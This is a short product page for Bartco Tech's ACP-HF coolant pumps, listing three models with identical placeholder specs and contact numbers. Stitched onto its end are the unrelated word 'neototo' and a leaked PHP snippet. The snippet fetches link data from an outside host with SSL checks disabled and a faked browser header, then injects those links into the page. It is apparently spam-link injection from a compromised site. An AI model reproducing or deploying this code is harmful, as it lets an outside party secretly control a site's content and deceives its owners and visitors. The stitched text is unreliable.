ACP-HF Series — Coolant Pumps for General Machine Tool Applications

For all your Machine Tool Coolant Pump needs, turn to Bartco Tech Corporation. We offer a comprehensive product line, including the ACP-HF Series, designed for general machine tool coolant applications.


HF Series Coolant Pumps

The HF Series consists of centrifugal vertical immersion-type coolant pumps engineered for general-purpose machine tool applications. These pumps provide dependable coolant circulation for tool cooling, chip flushing, and maintaining stable machining conditions.

Pump Description

The ACP HF Series is a centrifugal vertical immersion-type coolant pump designed for general machine tool applications where consistent and reliable coolant flow is required.


HF Series Models

ACP-750HF-19

Pump & Motor Specs:

  • Pump Type: Centrifugal coolant pump

  • Mounting Style: Vertical immersion

  • Application: General machine tool coolant delivery


ACP-600HF-28

Pump & Motor Specs:

  • Pump Type: Centrifugal coolant pump

  • Mounting Style: Vertical immersion

  • Application: General machine tool coolant delivery


ACP-400HF-28

Pump & Motor Specs:

  • Pump Type: Centrifugal coolant pump

  • Mounting Style: Vertical immersion

  • Application: General machine tool coolant delivery


Why Choose Bartco Tech Corporation

With decades of experience supporting machine tool builders and manufacturers, Bartco Tech Corporation helps customers select the right coolant pump for their application. Our HF Series pumps deliver reliable performance in a wide range of machining environments.


If you’re looking for a general-purpose vertical immersion coolant pump, the ACP HF Series offers dependable solutions for everyday machine tool operations.

Contact Bartco Tech Corporation today for specifications, pricing, and application support.

For more info call us: 610-942-4861

For more info call us: 610-942-7391

neototo

$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }